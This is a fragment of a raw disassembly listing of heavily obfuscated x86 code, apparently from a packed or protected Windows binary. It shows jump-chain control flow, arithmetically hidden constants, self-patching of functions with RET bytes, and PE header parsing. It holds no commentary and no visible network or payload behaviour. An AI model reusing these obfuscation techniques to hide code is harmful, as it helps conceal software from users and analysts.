; END OF FUNCTION CHUNK FOR sub_442AD1
; ---------------------------------------------------------------------------
loc_439383: ; CODE XREF: ut7h7i2x:loc_43C33Fj
jz loc_446FE6
jmp loc_44CE80
; ---------------------------------------------------------------------------
loc_43938E: ; CODE XREF: ut7h7i2x:0043C0D5j
jnz loc_452275
jmp loc_43DC4A
; ---------------------------------------------------------------------------
mov ds:off_41D0A8, eax
lea eax, sub_44B01F
mov byte ptr [eax], 0C3h
jmp loc_4554B8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B01F
loc_4393AD: ; CODE XREF: sub_44B01F:loc_43989Fj
mov eax, [esp+0]
push ebx
jmp loc_43E6E6
; END OF FUNCTION CHUNK FOR sub_44B01F
; =============== S U B R O U T I N E =======================================
sub_4393B6 proc near ; CODE XREF: sub_43D9A8+Ep
; ut7h7i2x:00452B3Ej
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0043D54D SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00442746 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A019 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004534BC SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00453FA4 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004547AF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456E97 SIZE 00000013 BYTES
xchg esi, [esp+0]
pop esi
push ebx
mov ebx, eax
xchg ebx, [esp+0]
lea eax, loc_440F7F
jmp loc_453FA4
sub_4393B6 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F7A5
loc_4393CB: ; CODE XREF: sub_43F7A5-5152j
; ut7h7i2x:loc_4485FBj
sub eax, 7083583Ah
xor eax, 86DAAFECh
add eax, ebp
add eax, 51F6CD40h
jmp loc_43FE70
; END OF FUNCTION CHUNK FOR sub_43F7A5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43ABBA
loc_4393E4: ; CODE XREF: sub_43ABBA+12j
shl eax, cl
push 0A37EC6F9h
xchg ecx, [esp+4+var_4]
mov edx, ecx
jmp loc_45660F
; END OF FUNCTION CHUNK FOR sub_43ABBA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4503C3
loc_4393F5: ; CODE XREF: sub_4503C3:loc_443386j
jz loc_451E65
jmp loc_44EBE8
; END OF FUNCTION CHUNK FOR sub_4503C3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439701
loc_439400: ; CODE XREF: sub_439701+1E33Fj
jnb loc_448C12
xor ebx, ecx
; END OF FUNCTION CHUNK FOR sub_439701
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_439408: ; CODE XREF: sub_439BF8:loc_43B301j
; sub_439BF8+12D1Fj ...
jnz loc_44EC60
cmp dword ptr [ebp-4], 6
jnz loc_44A583
jmp loc_4479CB
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F19A
loc_43941D: ; CODE XREF: sub_43F19A+13j
sub ebx, 4069D4C8h
xor ebx, 0AA7527E4h
add ecx, ebx
pop ebx
jmp loc_4497BC
; END OF FUNCTION CHUNK FOR sub_43F19A
; =============== S U B R O U T I N E =======================================
sub_439431 proc near ; CODE XREF: ut7h7i2x:00440613j
; sub_441765+1517Ep
; FUNCTION CHUNK AT 0043F482 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004589F9 SIZE 00000005 BYTES
xchg ecx, [esp+0]
pop ecx
push 0A2790266h
pop eax
or eax, 0F4D4846h
add eax, 44B750B4h
and eax, 1CB2D9ACh
jmp loc_43F482
sub_439431 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A9EE
loc_439452: ; CODE XREF: sub_43A9EE+Aj
pop esi
rol esi, 10h
or esi, 0A8385357h
add esi, 418540F3h
xchg esi, [esp+0]
jmp sub_43F058
; END OF FUNCTION CHUNK FOR sub_43A9EE
; =============== S U B R O U T I N E =======================================
sub_43946A proc near ; CODE XREF: sub_43AED9+19DCBj
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0044779A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457407 SIZE 00000028 BYTES
push ebp
mov ebp, edx
xchg ebp, [esp+4+var_4]
jmp loc_44779A
sub_43946A endp
; ---------------------------------------------------------------------------
loc_439475: ; CODE XREF: ut7h7i2x:loc_44992Ej
and eax, 476670B7h
or eax, 609E0A92h
add eax, 2BD6BC51h
add eax, ebp
add eax, 6F4B18F8h
mov eax, [eax]
push offset loc_452A36
jmp loc_43BA89
; ---------------------------------------------------------------------------
loc_43949B: ; CODE XREF: ut7h7i2x:loc_453BB5j
add edx, 0F73F5529h
mov [edx], eax
pop edx
retn
; ---------------------------------------------------------------------------
loc_4394A5: ; CODE XREF: ut7h7i2x:004529B8j
jmp loc_44B8E2
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4394AA proc near ; CODE XREF: sub_44C95Cj
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00459B40 SIZE 00000006 BYTES
push ebp
mov ebp, esp
jmp loc_459B40
sub_4394AA endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B1E7
loc_4394B2: ; CODE XREF: sub_44B1E7:loc_444ED5j
mov edi, 18F5FA9Eh
jmp loc_43D653
; END OF FUNCTION CHUNK FOR sub_44B1E7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449957
loc_4394BC: ; CODE XREF: sub_449957+9448j
push edx
push edx
push 0F6C6711Ah
pop edx
sub edx, 94D2C8EBh
add edx, 9E4FF96Dh
xchg edx, [esp+8+var_8]
jmp loc_44F4F9
; END OF FUNCTION CHUNK FOR sub_449957
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_205. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_4394D9: ; CODE XREF: ut7h7i2x:00442C83j
rol edi, 13h
; =============== S U B R O U T I N E =======================================
sub_4394DC proc near ; CODE XREF: ut7h7i2x:loc_446877p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00458A95 SIZE 0000000E BYTES
xchg esi, [esp+0]
pop esi
push 0A16AA59Ch
pop edx
and edx, 7DF682B2h
jnz loc_458A95
loc_4394F2: ; CODE XREF: ut7h7i2x:00456426j
jmp loc_44D497
sub_4394DC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D1F0
loc_4394F7: ; CODE XREF: sub_44D1F0-4841j
jmp loc_4525DA
; END OF FUNCTION CHUNK FOR sub_44D1F0
; ---------------------------------------------------------------------------
sub esi, 28D3C2C9h
jmp loc_45AC82
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44941C
loc_439507: ; CODE XREF: sub_44941C:loc_43CE07j
jz loc_43B165
jmp loc_45830E
; END OF FUNCTION CHUNK FOR sub_44941C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44445F
loc_439512: ; CODE XREF: sub_44445F:loc_451DCEj
mov eax, 0DD5E106Fh
push edx
push 54003C6h
pop edx
jmp loc_4396D4
; END OF FUNCTION CHUNK FOR sub_44445F
; ---------------------------------------------------------------------------
jz loc_4528D0
jmp loc_457AE9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E2AA
loc_43952E: ; CODE XREF: sub_44E2AA:loc_44964Dj
pop esi
jmp loc_440B14
; END OF FUNCTION CHUNK FOR sub_44E2AA
; ---------------------------------------------------------------------------
loc_439534: ; CODE XREF: ut7h7i2x:loc_4473D3j
or eax, eax
jnz loc_44EBCB
jmp loc_4516BB
; ---------------------------------------------------------------------------
loc_439541: ; CODE XREF: ut7h7i2x:004590FDj
push 0FE58DAEEh
; START OF FUNCTION CHUNK FOR sub_43E6CC
loc_439546: ; CODE XREF: ut7h7i2x:loc_44FD41j
; sub_43E6CC:loc_4590E4j
add edi, 0DC1E8105h
xchg edi, [esp+0]
jmp sub_43AA94
; END OF FUNCTION CHUNK FOR sub_43E6CC
; ---------------------------------------------------------------------------
loc_439554: ; CODE XREF: ut7h7i2x:loc_44376Cj
jz loc_453CF5
jmp loc_458B0F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B873
loc_43955F: ; CODE XREF: sub_43B873:loc_445585j
xchg ecx, [esp+0]
jmp sub_44E2C4
; END OF FUNCTION CHUNK FOR sub_43B873
; ---------------------------------------------------------------------------
locret_439567: ; CODE XREF: ut7h7i2x:00446A42j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445056
loc_439568: ; CODE XREF: sub_445056+5B14j
jle loc_444C0F
test edx, 67774F8Eh
jmp loc_449CFC
; END OF FUNCTION CHUNK FOR sub_445056
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439D5C
loc_439579: ; CODE XREF: sub_439D5C+1BFFj
or ebp, 983797FCh
loc_43957F: ; CODE XREF: ut7h7i2x:loc_449A62j
push 0
push 0
push esi
jmp loc_458789
; END OF FUNCTION CHUNK FOR sub_439D5C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43BA9E
loc_439589: ; CODE XREF: sub_43BA9E+E918j
test eax, ecx
jmp loc_453853
; END OF FUNCTION CHUNK FOR sub_43BA9E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44937E
loc_439590: ; CODE XREF: sub_44937E:loc_448868j
mov esp, ebp
xchg ebx, [esp+4+var_4]
mov ebp, ebx
pop ebx
jmp loc_44AAFB
; END OF FUNCTION CHUNK FOR sub_44937E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447F0A
loc_43959D: ; CODE XREF: sub_447F0A-BCF5j
jz loc_448142
jmp loc_44EA48
; END OF FUNCTION CHUNK FOR sub_447F0A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44DD56
loc_4395A8: ; CODE XREF: sub_44DD56-8386j
jbe loc_451617
loc_4395AE: ; CODE XREF: sub_44DD56:loc_4488C3j
add ebx, 80ACE7BEh
popf
xchg ebx, [esp-4+arg_0]
jmp sub_451EF2
; END OF FUNCTION CHUNK FOR sub_44DD56
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44917B
loc_4395BD: ; CODE XREF: sub_44917B-2725j
push 987246BAh
pop esi
and esi, 0C683D39Ch
call sub_43ABBA
; END OF FUNCTION CHUNK FOR sub_44917B
; START OF FUNCTION CHUNK FOR sub_44FDF2
loc_4395CE: ; CODE XREF: sub_44FDF2-6CACj
jmp loc_45222B
; END OF FUNCTION CHUNK FOR sub_44FDF2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4469B9
loc_4395D3: ; CODE XREF: sub_4469B9+C5DCj
jz loc_45A569
jmp loc_43EE4C
; END OF FUNCTION CHUNK FOR sub_4469B9
; ---------------------------------------------------------------------------
loc_4395DE: ; CODE XREF: ut7h7i2x:0045260Aj
jo loc_459087
sub edi, eax
loc_4395E6: ; CODE XREF: ut7h7i2x:loc_43A704j
cmp dword ptr [ebp-108h], 43776569h
jnz loc_446ECA
jmp loc_44E476
; =============== S U B R O U T I N E =======================================
sub_4395FB proc near ; CODE XREF: sub_4456B6+E2F3j
; sub_453E5C+3p
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043A335 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043DE5E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004417DB SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00449DAE SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044B97D SIZE 00000005 BYTES
xchg ecx, [esp+0]
pop ecx
push dword ptr [ebp+0Ch]
push ebx
jmp loc_43A335
sub_4395FB endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C852
loc_439608: ; CODE XREF: sub_44C852+460Fj
and edx, ebx
loc_43960A: ; CODE XREF: sub_44C852:loc_450E58j
add ebx, 8D524091h
xchg ebx, [esp+0]
jmp loc_441A88
; END OF FUNCTION CHUNK FOR sub_44C852
; ---------------------------------------------------------------------------
loc_439618: ; CODE XREF: ut7h7i2x:loc_4549BFj
; ut7h7i2x:004549D7j
or ecx, 2CCC250Ch
xor ecx, 2DFF3D6Ah
add eax, ecx
pop ecx
jmp loc_439000
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CEF8
loc_43962C: ; CODE XREF: sub_43CEF8:loc_45388Ej
mov byte ptr [eax], 0C3h
jmp loc_44C812
; END OF FUNCTION CHUNK FOR sub_43CEF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446215
loc_439634: ; CODE XREF: sub_446215j
pop edx
mov eax, [esp-4+arg_0]
push edx
push esi
push 287124D8h
pop esi
sub esi, 4FBFE493h
jmp loc_4435A6
; END OF FUNCTION CHUNK FOR sub_446215
; =============== S U B R O U T I N E =======================================
sub_43964B proc near ; CODE XREF: ut7h7i2x:0043F1E1j
; sub_457AEF-17D9Fp
; FUNCTION CHUNK AT 0043E482 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459DF2 SIZE 0000001D BYTES
xchg edx, [esp+0]
pop edx
mov eax, edx
push ecx
mov ecx, esi
xchg ecx, [esp+0]
jmp loc_43E482
sub_43964B endp
; ---------------------------------------------------------------------------
mov ds:off_41D074, eax
lea eax, loc_43CB3A
push offset loc_43D91C
jmp loc_43BB10
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445AD1
loc_439672: ; CODE XREF: sub_445AD1+5304j
xchg edx, [esp+0]
push 0BF3ECF3Fh
pop eax
xor eax, 0AC8CD408h
jmp loc_44B521
; END OF FUNCTION CHUNK FOR sub_445AD1
; ---------------------------------------------------------------------------
loc_439686: ; CODE XREF: ut7h7i2x:00448782j
sub edi, 8EBE9F70h
; START OF FUNCTION CHUNK FOR sub_44EC11
loc_43968C: ; CODE XREF: sub_44EC11:loc_448774j
sub eax, 926C7204h
xor eax, 66FCD8ABh
add eax, ebp
add eax, 7498B321h
jmp loc_448EF4
; END OF FUNCTION CHUNK FOR sub_44EC11
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44064B
loc_4396A5: ; CODE XREF: sub_44064B:loc_440654j
cmp dword ptr [eax-4], 4
jnz loc_4574B0
push offset loc_4486B7
jmp nullsub_259
; END OF FUNCTION CHUNK FOR sub_44064B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AED9
loc_4396B9: ; CODE XREF: sub_43AED9+14j
jz loc_4457E6
jmp loc_44F331
; END OF FUNCTION CHUNK FOR sub_43AED9
; ---------------------------------------------------------------------------
locret_4396C4: ; CODE XREF: ut7h7i2x:loc_4483FBj
retn
; ---------------------------------------------------------------------------
loc_4396C5: ; CODE XREF: ut7h7i2x:0043EE85j
jmp loc_44F1A7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43D3E7
loc_4396CA: ; CODE XREF: sub_43D3E7+1Dj
jmp nullsub_29
; END OF FUNCTION CHUNK FOR sub_43D3E7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_448321
loc_4396CF: ; CODE XREF: sub_448321-CDECj
jmp loc_446B00
; END OF FUNCTION CHUNK FOR sub_448321
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44445F
loc_4396D4: ; CODE XREF: sub_44445F-AF41j
jmp loc_456B47
; END OF FUNCTION CHUNK FOR sub_44445F
; ---------------------------------------------------------------------------
pop esi
xchg eax, edi
test eax, 0
; START OF FUNCTION CHUNK FOR sub_444A08
loc_4396E0: ; CODE XREF: sub_444A08+11DF8j
jmp nullsub_263
; END OF FUNCTION CHUNK FOR sub_444A08
; ---------------------------------------------------------------------------
align 2
dw 1DF2h
; ---------------------------------------------------------------------------
loc_4396E8: ; DATA XREF: ut7h7i2x:00448995o
; sub_445188+8CE9o
test eax, 322E4A28h
mov byte ptr [ebx], 0
; START OF FUNCTION CHUNK FOR sub_454DE8
loc_4396F0: ; CODE XREF: sub_454DE8+Dj
jmp loc_43C2B6
; END OF FUNCTION CHUNK FOR sub_454DE8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4396F5 proc near ; CODE XREF: sub_448215:loc_4418E2j
; sub_445FA9+408p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043A629 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0043AE2C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D1DC SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004443C1 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00444B2C SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044C613 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C875 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044EEE7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00450618 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0045300C SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00453D80 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045416A SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0045A718 SIZE 00000005 BYTES
push ebp
mov ebp, esp
push ecx
push ecx
jmp loc_45A718
sub_4396F5 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_4396FF: ; CODE XREF: ut7h7i2x:0043C013j
add edi, edx
; =============== S U B R O U T I N E =======================================
sub_439701 proc near ; CODE XREF: sub_450FDE:loc_445841p
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
; FUNCTION CHUNK AT 00439400 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0043A942 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043D104 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00442444 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00445B69 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00447F2E SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00448258 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448C12 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044B317 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004503BE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451585 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004529A7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00454EA4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455DB6 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00457533 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457A3E SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004580E0 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0045A2C0 SIZE 0000000B BYTES
xchg edx, [esp+0]
pop edx
pop ebx
mov eax, [ebp-10h]
jmp loc_448258
sub_439701 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4549F0
loc_43970E: ; CODE XREF: sub_4549F0-14F03j
; ut7h7i2x:0043FAFEj
xor eax, 5FE19974h
add eax, 541EF45Fh
mov eax, [eax]
or eax, eax
jnz loc_450FAE
jmp loc_4422A9
; END OF FUNCTION CHUNK FOR sub_4549F0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446CA0
loc_439729: ; CODE XREF: sub_446CA0:loc_44E7EBj
jl loc_45505E
jmp sub_43AB62
; END OF FUNCTION CHUNK FOR sub_446CA0
; ---------------------------------------------------------------------------
loc_439734: ; DATA XREF: sub_454B2B-48CBo
push eax
call sub_43D797
loc_43973A: ; CODE XREF: ut7h7i2x:00446294j
mov eax, 0B3h
push edx
push 0AFA10493h
jmp loc_456199
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444851
loc_43974A: ; CODE XREF: ut7h7i2x:loc_4423A4j
; sub_444851+Aj
push esi
push 89524E67h
pop esi
add esi, 0D9ECB51Bh
or esi, 0D9293E08h
jmp loc_44C016
; END OF FUNCTION CHUNK FOR sub_444851
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_453A91
loc_439762: ; CODE XREF: sub_453A91-1A1BCj
adc ecx, 0FDF6570Eh
loc_439768: ; CODE XREF: sub_453A91:loc_44D4C3j
call sub_444D26
; END OF FUNCTION CHUNK FOR sub_453A91
; START OF FUNCTION CHUNK FOR sub_442B3B
loc_43976D: ; CODE XREF: sub_442B3B+14ADAj
jmp loc_44EC49
; END OF FUNCTION CHUNK FOR sub_442B3B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452B14
loc_439772: ; CODE XREF: sub_452B14-10793j
jz loc_459CE1
shl esi, 1Ch
add ebp, eax
cmp esi, 72250AADh
jmp loc_44BFF5
; END OF FUNCTION CHUNK FOR sub_452B14
; =============== S U B R O U T I N E =======================================
sub_439788 proc near ; CODE XREF: ut7h7i2x:004468E4j
; sub_44E8DE:loc_44DFD7p
; FUNCTION CHUNK AT 0043A7B1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440CD6 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044455B SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00444E12 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00445168 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CD9E SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044DD23 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044DE07 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454C5C SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00455C4E SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00458F74 SIZE 0000000F BYTES
xchg ebx, [esp+0]
pop ebx
jz loc_454C5C
mov eax, [ebp-4]
add eax, 3Ch
mov eax, [eax]
add eax, [ebp-4]
jmp loc_44DE07
sub_439788 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
test al, al
jz loc_43FA46
jmp loc_43AF4A
; ---------------------------------------------------------------------------
mov ds:off_41D034, eax
call sub_43DC5C
; START OF FUNCTION CHUNK FOR sub_4497C1
loc_4397BA: ; CODE XREF: sub_4497C1+BF4Fj
jmp loc_4478D0
; END OF FUNCTION CHUNK FOR sub_4497C1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449700
loc_4397BF: ; CODE XREF: sub_449700:loc_44ACFCj
jmp nullsub_19
; END OF FUNCTION CHUNK FOR sub_449700
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B5D4
loc_4397C4: ; CODE XREF: sub_43B5D4:loc_448648j
rol ebx, 0Dh
test ebx, 2000h
jmp loc_43AAC4
; END OF FUNCTION CHUNK FOR sub_43B5D4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4545D8
loc_4397D2: ; CODE XREF: sub_4545D8+1Ej
test ebx, 40000h
jmp loc_4439AB
; END OF FUNCTION CHUNK FOR sub_4545D8
; ---------------------------------------------------------------------------
loc_4397DD: ; CODE XREF: ut7h7i2x:0043F49Cj
; ut7h7i2x:loc_4584CBj
push edx
push 1331505Ch
pop edx
rol edx, 19h
cmp edx, 2E79124Ch
jmp loc_4539CA
; ---------------------------------------------------------------------------
loc_4397F2: ; CODE XREF: ut7h7i2x:00440C3Bj
popf
pushf
loc_4397F4: ; CODE XREF: ut7h7i2x:00440C20j
add eax, 0FD316FF5h
add eax, ebp
add eax, 0BA1DB9B5h
mov eax, [eax]
jmp loc_455F47
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_454B2B
loc_439809: ; CODE XREF: sub_454B2B:loc_439BEEj
add eax, 88E9E6AEh
xor eax, 0B7735BAEh
add eax, ebp
add eax, 70E5FA35h
jmp loc_44B26A
; END OF FUNCTION CHUNK FOR sub_454B2B
; ---------------------------------------------------------------------------
push offset loc_456DD3
jmp loc_454A48
; ---------------------------------------------------------------------------
loc_43982C: ; CODE XREF: ut7h7i2x:loc_43A8B7j
or ecx, 363E69E4h
xor ecx, 0F29910E9h
rol ecx, 0Eh
xor ecx, 0F2FD69B4h
add ecx, 0B705FF63h
push offset sub_4431BB
jmp locret_440072
; ---------------------------------------------------------------------------
loc_439851: ; CODE XREF: ut7h7i2x:00439F5Cj
jb loc_44B69B
not ebp
; START OF FUNCTION CHUNK FOR sub_44F7F8
loc_439859: ; CODE XREF: sub_44F7F8+Dj
xor edx, 7E4594CFh
add edx, ebp
add edx, 7D51185Bh
mov [edx], eax
push offset loc_456425
jmp loc_45996C
; END OF FUNCTION CHUNK FOR sub_44F7F8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44AA54
loc_439873: ; CODE XREF: sub_44AA54:loc_44B015j
jz loc_441EB9
jmp loc_44E4CB
; END OF FUNCTION CHUNK FOR sub_44AA54
; ---------------------------------------------------------------------------
xor ebx, 0C17B4C79h
jmp sub_4438BC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44A7D2
loc_439889: ; CODE XREF: sub_44A7D2:loc_43F883j
call sub_45854D
push offset loc_4449D5
jmp nullsub_74
; END OF FUNCTION CHUNK FOR sub_44A7D2
; ---------------------------------------------------------------------------
test edi, edx
jmp loc_45A201
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B01F
loc_43989F: ; CODE XREF: sub_44B01F+1j
js loc_4393AD
mov eax, [esp+4+var_4]
push edx
call sub_43F7A5
mov eax, 0B4B93D2h
push ecx
jmp loc_43AE08
; END OF FUNCTION CHUNK FOR sub_44B01F
; ---------------------------------------------------------------------------
loc_4398B9: ; CODE XREF: ut7h7i2x:0043ECADj
jg loc_4560D6
; =============== S U B R O U T I N E =======================================
sub_4398BF proc near ; CODE XREF: sub_445EDA+6p
; FUNCTION CHUNK AT 0043B229 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043C11C SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044926E SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0044E830 SIZE 00000005 BYTES
xchg edx, [esp+0]
pop edx
push edi
jmp loc_44E830
sub_4398BF endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_453A91
loc_4398C9: ; CODE XREF: sub_453A91-65C8j
ja loc_446823
jnb loc_43B47E
jmp loc_439762
; END OF FUNCTION CHUNK FOR sub_453A91
; ---------------------------------------------------------------------------
jg loc_4505DC
jmp loc_4561C5
; ---------------------------------------------------------------------------
locret_4398E5: ; CODE XREF: ut7h7i2x:loc_43EFDBj
retn
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_529. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_4398E7: ; CODE XREF: ut7h7i2x:0043DCD3j
call sub_44E2C4
test al, al
jmp loc_43E86B
; ---------------------------------------------------------------------------
sub ecx, 7F2E66EEh
shr ebp, 1Bh
jmp sub_43A92F
; ---------------------------------------------------------------------------
loc_439901: ; CODE XREF: ut7h7i2x:loc_45914Bj
lea eax, nullsub_123
mov byte ptr [eax], 0C3h
jmp nullsub_123
; ---------------------------------------------------------------------------
push edi
push 203CE326h
xchg ecx, [esp]
mov edi, ecx
pop ecx
add edi, 3595E0D3h
jmp loc_4536F2
; ---------------------------------------------------------------------------
and ebx, 7E9CEB5Eh
jmp loc_4584F8
; ---------------------------------------------------------------------------
loc_439931: ; CODE XREF: ut7h7i2x:00445893j
adc esi, 0C1FE4A0Ah
; START OF FUNCTION CHUNK FOR sub_4529E0
loc_439937: ; CODE XREF: sub_4529E0:loc_445882j
or edx, 60733CCFh
xor edx, 758DD182h
add eax, edx
push offset loc_44121D
; END OF FUNCTION CHUNK FOR sub_4529E0
; START OF FUNCTION CHUNK FOR sub_43FF65
loc_43994A: ; CODE XREF: sub_43FF65+12609j
jmp loc_447A12
; END OF FUNCTION CHUNK FOR sub_43FF65
; ---------------------------------------------------------------------------
loc_43994F: ; CODE XREF: ut7h7i2x:0044DAD2j
xor ecx, 0DC08D00Eh
loc_439955: ; CODE XREF: ut7h7i2x:loc_44137Dj
mov byte ptr [ebp-806h], 0
mov byte ptr [ebp-805h], 0
mov byte ptr [ebp-804h], 0
mov byte ptr [ebp-803h], 0
mov byte ptr [ebp-802h], 0
mov byte ptr [ebp-801h], 1
lea eax, [ebp-80Ch]
jmp loc_44141B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45500F
loc_43998A: ; CODE XREF: sub_45500F:loc_447859j
shr ecx, 16h
push esi
jle loc_4589FF
or ebp, 233C470Fh
jmp loc_43BFBD
; END OF FUNCTION CHUNK FOR sub_45500F
; =============== S U B R O U T I N E =======================================
sub_43999F proc near ; DATA XREF: ut7h7i2x:0045464Fo
xor esi, 6E97457Dh
add esi, ebp
add esi, 217DBDE3h
mov [esi], eax
pop esi
jmp loc_4505C3
sub_43999F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4399B5 proc near ; CODE XREF: sub_444DE9+5DD6j
; FUNCTION CHUNK AT 00440775 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B0FF SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00451089 SIZE 00000005 BYTES
add esp, 0FFFFFFD0h
jmp loc_440775
sub_4399B5 endp
; ---------------------------------------------------------------------------
